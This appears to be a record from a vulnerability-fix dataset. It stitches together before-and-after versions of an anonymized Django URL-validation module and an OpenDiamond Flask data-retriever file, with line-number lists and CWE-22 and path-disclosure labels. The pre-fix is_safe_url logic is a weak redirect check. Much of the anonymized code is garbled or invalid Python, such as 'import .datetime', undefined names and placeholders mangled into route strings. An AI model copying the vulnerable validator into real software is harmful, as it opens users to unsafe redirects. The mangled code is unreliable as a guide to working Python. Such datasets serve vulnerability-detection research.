if VAR_33 is not None:
break
else:
raise ValueError("%r is not in a valid HTTP VAR_20 format" % VAR_20)
try:
VAR_34 = int(VAR_33.group('year'))
if VAR_34 < 100:
if VAR_34 < 70:
VAR_34 += 2000
else:
VAR_34 += 1900
VAR_35 = VAR_1.index(VAR_33.group('mon').lower()) + 1
VAR_36 = int(VAR_33.group('day'))
VAR_37 = int(VAR_33.group('hour'))
VAR_38 = int(VAR_33.group('min'))
VAR_39 = int(VAR_33.group('sec'))
VAR_40 = datetime.datetime(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38, VAR_39)
return calendar.timegm(VAR_40.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % VAR_20), sys.exc_info()[2])
def FUNC_8(VAR_20):
try:
return FUNC_7(VAR_20)
except Exception:
pass
def FUNC_9(VAR_21):
if len(VAR_21) > 13:
raise ValueError("Base36 input too large")
VAR_28 = int(VAR_21, 36)
if six.PY2 and VAR_28 > sys.maxint:
raise ValueError("Base36 input too large")
return VAR_28
def FUNC_10(VAR_22):
VAR_29 = '0123456789abcdefghijklmnopqrstuvwxyz'
if VAR_22 < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(VAR_22, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if VAR_22 > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if VAR_22 < 36:
return VAR_29[VAR_22]
VAR_30 = ''
while VAR_22 != 0:
VAR_22, VAR_41 = divmod(VAR_22, 36)
VAR_30 = VAR_29[VAR_41] + VAR_30
return VAR_30
def FUNC_11(VAR_21):
return base64.urlsafe_b64encode(VAR_21).rstrip(b'\VAR_41=')
def FUNC_12(VAR_21):
VAR_21 = force_bytes(VAR_21)
try:
return base64.urlsafe_b64decode(VAR_21.ljust(len(VAR_21) + len(VAR_21) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def FUNC_13(VAR_23):
VAR_31 = VAR_0.findall(VAR_23)
if not VAR_31:
return [VAR_23]
VAR_31 = [e.encode('ascii').decode('unicode_escape') for e in VAR_31]
return VAR_31
def FUNC_14(VAR_24):
return '"%s"' % VAR_24.replace('\\', '\\\\').replace('"', '\\"')
def FUNC_15(VAR_24):
return VAR_24.strip('"').replace('\\"', '"').replace('\\\\', '\\') if VAR_24 else VAR_24
def FUNC_16(VAR_25, VAR_26):
if not VAR_26:
return False
VAR_26 = pattern.lower()
return (
VAR_26[0] == '.' and (VAR_25.endswith(VAR_26) or VAR_25 == VAR_26[1:]) or
VAR_26 == VAR_25
)
def FUNC_17(VAR_14, VAR_25=None):
if VAR_14 is not None:
VAR_14 = VAR_14.strip()
if not VAR_14:
return False
VAR_14 = VAR_14.replace('\\', '/')
if VAR_14.startswith('///'):
return False
VAR_32 = urlparse(VAR_14)
if not VAR_32.netloc and VAR_32.scheme:
return False
if unicodedata.category(VAR_14[0])[0] == 'C':
return False
return ((not VAR_32.netloc or VAR_32.netloc == VAR_25) and
(not VAR_32.scheme or VAR_32.scheme in ['http', 'https']))
| from __future__ import unicode_literals
import base64
import calendar
import .datetime
import re
import .sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import .six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import keep_lazy_text
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, FUNC_4 as original_urlencode,
urlparse,
)
VAR_0 = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
VAR_1 = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
VAR_2 = r'(?P<VAR_36>\d{2})'
VAR_3 = r'(?P<VAR_36>[ \d]\d)'
VAR_4 = r'(?P<mon>\w{3})'
VAR_5 = r'(?P<VAR_34>\d{4})'
VAR_6 = r'(?P<VAR_34>\d{2})'
VAR_7 = r'(?P<VAR_37>\d{2}):(?P<VAR_38>\d{2}):(?P<VAR_39>\d{2})'
VAR_8 = re.compile(r'^\w{3}, %VAR_21 %VAR_21 %VAR_21 %s GMT$' % (VAR_2, VAR_4, VAR_5, VAR_7))
VAR_9 = re.compile(r'^\w{6,9}, %VAR_21-%VAR_21-%VAR_21 %s GMT$' % (VAR_2, VAR_4, VAR_6, VAR_7))
VAR_10 = re.compile(r'^\w{3} %VAR_21 %VAR_21 %VAR_21 %s$' % (VAR_4, VAR_3, VAR_7, VAR_5))
VAR_11 = str(":/?#[]@")
VAR_12 = str("!$&'()*+,;=")
VAR_13 = {
'http': 80,
'https': 443,
}
@keep_lazy_text
def FUNC_0(VAR_14, VAR_15='/'):
return force_text(quote(force_str(VAR_14), force_str(VAR_15)))
@keep_lazy_text
def FUNC_1(VAR_14, VAR_15=''):
return force_text(quote_plus(force_str(VAR_14), force_str(VAR_15)))
@keep_lazy_text
def FUNC_2(VAR_16):
return force_text(unquote(force_str(VAR_16)))
@keep_lazy_text
def FUNC_3(VAR_16):
return force_text(unquote_plus(force_str(VAR_16)))
def FUNC_4(VAR_17, VAR_18=0):
if isinstance(VAR_17, MultiValueDict):
VAR_17 = query.lists()
elif hasattr(VAR_17, 'items'):
VAR_17 = query.items()
return original_urlencode(
[(force_str(k),
[force_str(VAR_22) for VAR_22 in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in VAR_17],
VAR_18)
def FUNC_5(VAR_19=None):
VAR_27 = formatdate(VAR_19)
return '%VAR_21-%s-%VAR_21 GMT' % (VAR_27[:7], VAR_27[8:11], VAR_27[12:25])
def FUNC_6(VAR_19=None):
return formatdate(VAR_19, usegmt=True)
def FUNC_7(VAR_20):
for regex in VAR_8, VAR_9, VAR_10:
VAR_33 = regex.match(VAR_20)
if VAR_33 is not None:
break
else:
raise ValueError("%r is not in a valid HTTP VAR_20 format" % VAR_20)
try:
VAR_34 = int(VAR_33.group('year'))
if VAR_34 < 100:
if VAR_34 < 70:
VAR_34 += 2000
else:
VAR_34 += 1900
VAR_35 = VAR_1.index(VAR_33.group('mon').lower()) + 1
VAR_36 = int(VAR_33.group('day'))
VAR_37 = int(VAR_33.group('hour'))
VAR_38 = int(VAR_33.group('min'))
VAR_39 = int(VAR_33.group('sec'))
VAR_40 = datetime.datetime(VAR_34, VAR_35, VAR_36, VAR_37, VAR_38, VAR_39)
return calendar.timegm(VAR_40.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % VAR_20), sys.exc_info()[2])
def FUNC_8(VAR_20):
try:
return FUNC_7(VAR_20)
except Exception:
pass
def FUNC_9(VAR_21):
if len(VAR_21) > 13:
raise ValueError("Base36 input too large")
VAR_28 = int(VAR_21, 36)
if six.PY2 and VAR_28 > sys.maxint:
raise ValueError("Base36 input too large")
return VAR_28
def FUNC_10(VAR_22):
VAR_29 = '0123456789abcdefghijklmnopqrstuvwxyz'
if VAR_22 < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(VAR_22, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if VAR_22 > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if VAR_22 < 36:
return VAR_29[VAR_22]
VAR_30 = ''
while VAR_22 != 0:
VAR_22, VAR_41 = divmod(VAR_22, 36)
VAR_30 = VAR_29[VAR_41] + VAR_30
return VAR_30
def FUNC_11(VAR_21):
return base64.urlsafe_b64encode(VAR_21).rstrip(b'\VAR_41=')
def FUNC_12(VAR_21):
VAR_21 = force_bytes(VAR_21)
try:
return base64.urlsafe_b64decode(VAR_21.ljust(len(VAR_21) + len(VAR_21) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def FUNC_13(VAR_23):
VAR_31 = VAR_0.findall(VAR_23)
if not VAR_31:
return [VAR_23]
VAR_31 = [e.encode('ascii').decode('unicode_escape') for e in VAR_31]
return VAR_31
def FUNC_14(VAR_24):
return '"%s"' % VAR_24.replace('\\', '\\\\').replace('"', '\\"')
def FUNC_15(VAR_24):
return VAR_24.strip('"').replace('\\"', '"').replace('\\\\', '\\') if VAR_24 else VAR_24
def FUNC_16(VAR_25, VAR_26):
if not VAR_26:
return False
VAR_26 = pattern.lower()
return (
VAR_26[0] == '.' and (VAR_25.endswith(VAR_26) or VAR_25 == VAR_26[1:]) or
VAR_26 == VAR_25
)
def FUNC_17(VAR_14, VAR_25=None):
if VAR_14 is not None:
VAR_14 = VAR_14.strip()
if not VAR_14:
return False
return FUNC_18(VAR_14, VAR_25) and FUNC_18(VAR_14.replace('\\', '/'), VAR_25)
def FUNC_18(VAR_14, VAR_25):
if VAR_14.startswith('///'):
return False
VAR_32 = urlparse(VAR_14)
if not VAR_32.netloc and VAR_32.scheme:
return False
if unicodedata.category(VAR_14[0])[0] == 'C':
return False
return ((not VAR_32.netloc or VAR_32.netloc == VAR_25) and
(not VAR_32.scheme or VAR_32.scheme in ['http', 'https']))
| [
2,
11,
20,
22,
33,
36,
41,
42,
52,
53,
63,
64,
72,
73,
81,
82,
98,
99,
103,
107,
112,
113,
118,
122,
126,
127,
131,
134,
137,
138,
139,
162,
163,
172,
173,
174,
175,
181,
182,
183,
187,
188,
192,
193,
213,
214,
221,
222,
233,
234,
243,
247,
248,
254,
255,
261,
262,
267,
274,
280,
281,
286,
293,
295,
296,
300,
301,
302,
303,
306,
307,
308,
313,
45,
46,
47,
48,
49,
50,
56,
57,
58,
59,
60,
61,
67,
68,
69,
70,
76,
77,
78,
79,
84,
85,
86,
87,
88,
101,
102,
103,
104,
105,
106,
107,
108,
109,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
129,
130,
131,
132,
133,
134,
135,
136,
165,
166,
167,
177,
178,
179,
180,
195,
196,
197,
216,
217,
218,
219,
224,
225,
226,
227,
236,
237,
238,
239,
240,
250,
251,
252,
257,
258,
259,
264,
265,
266,
267,
268,
269,
270,
271,
283,
284,
285,
286,
287,
288
] | [
2,
11,
20,
22,
33,
36,
41,
42,
52,
53,
63,
64,
72,
73,
81,
82,
98,
99,
103,
107,
112,
113,
118,
122,
126,
127,
131,
134,
137,
138,
139,
162,
163,
172,
173,
174,
175,
181,
182,
183,
187,
188,
192,
193,
213,
214,
221,
222,
233,
234,
243,
247,
248,
254,
255,
261,
262,
267,
274,
280,
281,
286,
293,
294,
296,
297,
299,
300,
304,
305,
306,
307,
310,
311,
312,
317,
45,
46,
47,
48,
49,
50,
56,
57,
58,
59,
60,
61,
67,
68,
69,
70,
76,
77,
78,
79,
84,
85,
86,
87,
88,
101,
102,
103,
104,
105,
106,
107,
108,
109,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
129,
130,
131,
132,
133,
134,
135,
136,
165,
166,
167,
177,
178,
179,
180,
195,
196,
197,
216,
217,
218,
219,
224,
225,
226,
227,
236,
237,
238,
239,
240,
250,
251,
252,
257,
258,
259,
264,
265,
266,
267,
268,
269,
270,
271,
283,
284,
285,
286,
287,
288
] |
0CWE-22
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.utils import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
BASEURL = 'augment'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
KEYWORD = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
keywords/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<base_rate>
/augment/root/STREAM/distributed/1of2/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = 'STREAM'
DATAROOT = config.dataroot
scope_blueprint = Blueprint('augment_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>' +
'/start/<int:start>/limit/<int:limit>')
def get_scope(rootdir, index=0, total=1, params=None, start=0, limit=sys.maxsize):
global KEYWORD
if rootdir == "0":
rootdir = INDEXDIR
rootdir = _get_obj_absolute_path(rootdir)
seed = None
percentage = 0.
seed, percentage = decode_params(params)
# Assuming the same positive list is present in all the servers
# Always create a new index file
base_list, KEYWORD = create_index(rootdir, percentage, seed, index, total)
total_entries = len(base_list)
start = start if start > 0 else 0
end = min(total_entries, start + limit) if limit > 0 else total_entries
base_list = base_list[start:end]
total_entries = end - start
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
for path in base_list:
path = path.strip()
yield _get_object_element(object_path=path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
"""
Decodes the params which are '_' seperated
<[d]eterminant/[r]andom>_<random_seed>_<baserate>
"""
keywords = params.split('_')
mix_type = keywords[0]
seed = None
if len(keywords) > 1:
seed = int(keywords[1])
if mix_type == 'r' or seed is None:
seed = random.randrange(10000)
percentage = 0.1 # default base_rate = 0.1%
if len(keywords) > 2:
percentage = float(keywords[2])
return seed, round(percentage, 4)
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
meta = {'_gt_label': KEYWORD}
if KEYWORD in path:
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', present=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
@scope_blueprint.route('/meta/<path:present>')
def get_object_meta(present=False):
attrs = dict()
if present:
attrs['_gt_label'] = KEYWORD
return jsonify(attrs)
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
def create_index(base_dir, base_rate=0.05, seed=42, rank=0, total_servers=1):
"""
Creates Index List File:
Assuming name of files NEGATIVE (e.g:subset YFCC), POSITIVE
"""
filepath_split = ['STREAM', "{:.2f}".format(base_rate), str(rank), str(total_servers), str(seed)]
filepath = '_'.join(filepath_split)
filepath = os.path.join(base_dir, filepath)
positive_path = os.path.join(base_dir, 'POSITIVE')
negative_path = os.path.join(base_dir, 'NEGATIVE')
positive_firstline = open(positive_path).readline().rstrip()
keyword = positive_firstline.split('/')[-2] # Assuming all positives are in the same parent dir
_log.info("Dir {} BR: {} Seed:{} FP{}".format(base_dir, base_rate, seed, filepath))
sys.stdout.flush()
if not os.path.exists(filepath):
positive_data = read_file_list(positive_path) # same across servers
negative_data = read_file_list(negative_path) # different across servers
random.Random(seed).shuffle(positive_data)
random.Random(seed).shuffle(negative_data)
len_positive = len(positive_data)
start_idx = int(rank * (1.0 / total_servers) * len_positive)
end_idx = int((rank+1) * (1.0 / total_servers) * len_positive)
positive_data = positive_data[start_idx:end_idx]
len_positive = len(positive_data)
negative_sample = int(len_positive * (100./base_rate -1))
negative_data = negative_data[:negative_sample]
return write_data(filepath, [negative_data, positive_data], seed), keyword
return read_file_list(filepath), keyword
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
BASEURL = 'augment'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
KEYWORD = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
keywords/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<base_rate>
/augment/root/STREAM/distributed/1of2/keywords/d_42_1.0
"""
def init(config):
global INDEXDIR, DATAROOT # pylint: disable=global-statement
INDEXDIR = 'STREAM'
DATAROOT = config.dataroot
scope_blueprint = Blueprint('augment_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>')
@scope_blueprint.route('/root/<rootdir>/distributed/<int:index>of<int:total>' +
'/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/root/<rootdir>/keywords/<params>' +
'/start/<int:start>/limit/<int:limit>')
def get_scope(rootdir, index=0, total=1, params=None, start=0, limit=sys.maxsize):
global KEYWORD
if rootdir == "0":
rootdir = INDEXDIR
rootdir = _get_obj_absolute_path(rootdir)
seed = None
percentage = 0.
seed, percentage = decode_params(params)
# Assuming the same positive list is present in all the servers
# Always create a new index file
base_list, KEYWORD = create_index(rootdir, percentage, seed, index, total)
total_entries = len(base_list)
start = start if start > 0 else 0
end = min(total_entries, start + limit) if limit > 0 else total_entries
base_list = base_list[start:end]
total_entries = end - start
def generate():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if STYLE:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(total_entries)
for path in base_list:
path = path.strip()
yield _get_object_element(object_path=path) + '\n'
yield '</objectlist>\n'
headers = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(generate()),
status="200 OK",
headers=headers)
def decode_params(params):
"""
Decodes the params which are '_' seperated
<[d]eterminant/[r]andom>_<random_seed>_<baserate>
"""
keywords = params.split('_')
mix_type = keywords[0]
seed = None
if len(keywords) > 1:
seed = int(keywords[1])
if mix_type == 'r' or seed is None:
seed = random.randrange(10000)
percentage = 0.1 # default base_rate = 0.1%
if len(keywords) > 2:
percentage = float(keywords[2])
return seed, round(percentage, 4)
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
headers = Headers([('Content-Type', 'text/xml')])
return Response(_get_object_element(object_path=object_path),
"200 OK",
headers=headers)
def _get_object_element(object_path):
path = _get_obj_absolute_path(object_path)
meta = {'_gt_label': KEYWORD}
if KEYWORD in path:
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)),
quoteattr(url_for('.get_object_meta', present=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', object_path=object_path)),
quoteattr(_get_object_src_uri(object_path)))
@scope_blueprint.route('/meta/<path:present>')
def get_object_meta(present=False):
attrs = dict()
if present:
attrs['_gt_label'] = KEYWORD
return jsonify(attrs)
def _get_object_src_uri(object_path):
if LOCAL_OBJ_URI:
return 'file://' + _get_obj_absolute_path(object_path)
return url_for('.get_object_src_http', obj_path=object_path)
def _get_obj_absolute_path(obj_path):
return safe_join(DATAROOT, obj_path)
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
path = _get_obj_absolute_path(obj_path)
headers = Headers()
# With add_etags=True, conditional=True
# Flask should be smart enough to do 304 Not Modified
response = send_file(path,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
response.headers.extend(headers)
return response
def create_index(base_dir, base_rate=0.05, seed=42, rank=0, total_servers=1):
"""
Creates Index List File:
Assuming name of files NEGATIVE (e.g:subset YFCC), POSITIVE
"""
filepath_split = ['STREAM', "{:.2f}".format(base_rate), str(rank), str(total_servers), str(seed)]
filepath = '_'.join(filepath_split)
filepath = os.path.join(base_dir, filepath)
positive_path = os.path.join(base_dir, 'POSITIVE')
negative_path = os.path.join(base_dir, 'NEGATIVE')
positive_firstline = open(positive_path).readline().rstrip()
keyword = positive_firstline.split('/')[-2] # Assuming all positives are in the same parent dir
_log.info("Dir {} BR: {} Seed:{} FP{}".format(base_dir, base_rate, seed, filepath))
sys.stdout.flush()
if not os.path.exists(filepath):
positive_data = read_file_list(positive_path) # same across servers
negative_data = read_file_list(negative_path) # different across servers
random.Random(seed).shuffle(positive_data)
random.Random(seed).shuffle(negative_data)
len_positive = len(positive_data)
start_idx = int(rank * (1.0 / total_servers) * len_positive)
end_idx = int((rank+1) * (1.0 / total_servers) * len_positive)
positive_data = positive_data[start_idx:end_idx]
len_positive = len(positive_data)
negative_sample = int(len_positive * (100./base_rate -1))
negative_data = negative_data[:negative_sample]
return write_data(filepath, [negative_data, positive_data], seed), keyword
return read_file_list(filepath), keyword
| path_disclosure | {
"code": [
"from werkzeug.utils import safe_join"
],
"line_no": [
27
]
} | {
"code": [
"from werkzeug.security import safe_join"
],
"line_no": [
27
]
} |
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.utils import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
VAR_0 = 'augment'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_31, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
VAR_6 = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
VAR_29/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<VAR_20>
/augment/root/STREAM/distributed/1of2/VAR_29/d_42_1.0
"""
def FUNC_0(VAR_7):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = 'STREAM'
VAR_4 = VAR_7.dataroot
VAR_8 = Blueprint('augment_store', __name__)
VAR_9 = logging.getLogger(__name__)
@VAR_8.route('/root/<VAR_10>/distributed/<int:VAR_11>of<int:VAR_12>' +
'/VAR_29/<VAR_13>')
@VAR_8.route('/root/<VAR_10>/VAR_29/<VAR_13>')
@VAR_8.route('/root/<VAR_10>/distributed/<int:VAR_11>of<int:VAR_12>' +
'/VAR_29/<VAR_13>/VAR_14/<int:VAR_14>/VAR_15/<int:VAR_15>')
@VAR_8.route('/root/<VAR_10>/VAR_29/<VAR_13>' +
'/VAR_14/<int:VAR_14>/VAR_15/<int:VAR_15>')
def FUNC_1(VAR_10, VAR_11=0, VAR_12=1, VAR_13=None, VAR_14=0, VAR_15=sys.maxsize):
global VAR_6
if VAR_10 == "0":
VAR_10 = VAR_3
VAR_10 = FUNC_7(VAR_10)
VAR_21 = None
VAR_24 = 0.
VAR_21, VAR_24 = FUNC_2(VAR_13)
VAR_25, VAR_6 = FUNC_9(VAR_10, VAR_24, VAR_21, VAR_11, VAR_12)
VAR_26 = len(VAR_25)
VAR_14 = start if VAR_14 > 0 else 0
VAR_27 = min(VAR_26, VAR_14 + VAR_15) if VAR_15 > 0 else VAR_26
VAR_25 = base_list[VAR_14:VAR_27]
VAR_26 = VAR_27 - VAR_14
def FUNC_10():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_26)
for VAR_31 in VAR_25:
VAR_31 = path.strip()
yield FUNC_4(VAR_16=VAR_31) + '\n'
yield '</objectlist>\n'
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_10()),
status="200 OK",
VAR_28=headers)
def FUNC_2(VAR_13):
VAR_29 = VAR_13.split('_')
VAR_30 = VAR_29[0]
VAR_21 = None
if len(VAR_29) > 1:
VAR_21 = int(VAR_29[1])
if VAR_30 == 'r' or VAR_21 is None:
VAR_21 = random.randrange(10000)
VAR_24 = 0.1 # default VAR_20 = 0.1%
if len(VAR_29) > 2:
VAR_24 = float(VAR_29[2])
return VAR_21, round(VAR_24, 4)
@VAR_8.route('/id/<VAR_31:VAR_16>')
def FUNC_3(VAR_16):
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_4(VAR_16=object_path),
"200 OK",
VAR_28=headers)
def FUNC_4(VAR_16):
VAR_31 = FUNC_7(VAR_16)
VAR_32 = {'_gt_label': VAR_6}
if VAR_6 in VAR_31:
return '<object id={} src={} VAR_32={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_16=object_path)),
quoteattr(FUNC_6(VAR_16)),
quoteattr(url_for('.get_object_meta', VAR_17=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_16=object_path)),
quoteattr(FUNC_6(VAR_16)))
@VAR_8.route('/VAR_32/<VAR_31:VAR_17>')
def FUNC_5(VAR_17=False):
VAR_33 = dict()
if VAR_17:
VAR_33['_gt_label'] = VAR_6
return jsonify(VAR_33)
def FUNC_6(VAR_16):
if VAR_2:
return 'file://' + FUNC_7(VAR_16)
return url_for('.get_object_src_http', VAR_18=VAR_16)
def FUNC_7(VAR_18):
return safe_join(VAR_4, VAR_18)
@VAR_8.route('/obj/<VAR_31:VAR_18>')
def FUNC_8(VAR_18):
VAR_31 = FUNC_7(VAR_18)
VAR_28 = Headers()
VAR_34 = send_file(VAR_31,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_34.headers.extend(VAR_28)
return VAR_34
def FUNC_9(VAR_19, VAR_20=0.05, VAR_21=42, VAR_22=0, VAR_23=1):
VAR_35 = ['STREAM', "{:.2f}".format(VAR_20), str(VAR_22), str(VAR_23), str(VAR_21)]
VAR_36 = '_'.join(VAR_35)
VAR_36 = os.path.join(VAR_19, VAR_36)
VAR_37 = os.path.join(VAR_19, 'POSITIVE')
VAR_38 = os.path.join(VAR_19, 'NEGATIVE')
VAR_39 = open(VAR_37).readline().rstrip()
VAR_40 = VAR_39.split('/')[-2] # Assuming all positives are in the same parent dir
VAR_9.info("Dir {} BR: {} Seed:{} FP{}".format(VAR_19, VAR_20, VAR_21, VAR_36))
sys.stdout.flush()
if not os.path.exists(VAR_36):
VAR_41 = read_file_list(VAR_37) # same across servers
VAR_42 = read_file_list(VAR_38) # different across servers
random.Random(VAR_21).shuffle(VAR_41)
random.Random(VAR_21).shuffle(VAR_42)
VAR_43 = len(VAR_41)
VAR_44 = int(VAR_22 * (1.0 / VAR_23) * VAR_43)
VAR_45 = int((VAR_22+1) * (1.0 / VAR_23) * VAR_43)
VAR_41 = positive_data[VAR_44:VAR_45]
VAR_43 = len(VAR_41)
VAR_46 = int(VAR_43 * (100./VAR_20 -1))
VAR_42 = negative_data[:VAR_46]
return write_data(VAR_36, [VAR_42, VAR_41], VAR_21), VAR_40
return read_file_list(VAR_36), VAR_40
|
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
VAR_0 = 'augment'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_31, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
VAR_6 = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
VAR_29/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<VAR_20>
/augment/root/STREAM/distributed/1of2/VAR_29/d_42_1.0
"""
def FUNC_0(VAR_7):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = 'STREAM'
VAR_4 = VAR_7.dataroot
VAR_8 = Blueprint('augment_store', __name__)
VAR_9 = logging.getLogger(__name__)
@VAR_8.route('/root/<VAR_10>/distributed/<int:VAR_11>of<int:VAR_12>' +
'/VAR_29/<VAR_13>')
@VAR_8.route('/root/<VAR_10>/VAR_29/<VAR_13>')
@VAR_8.route('/root/<VAR_10>/distributed/<int:VAR_11>of<int:VAR_12>' +
'/VAR_29/<VAR_13>/VAR_14/<int:VAR_14>/VAR_15/<int:VAR_15>')
@VAR_8.route('/root/<VAR_10>/VAR_29/<VAR_13>' +
'/VAR_14/<int:VAR_14>/VAR_15/<int:VAR_15>')
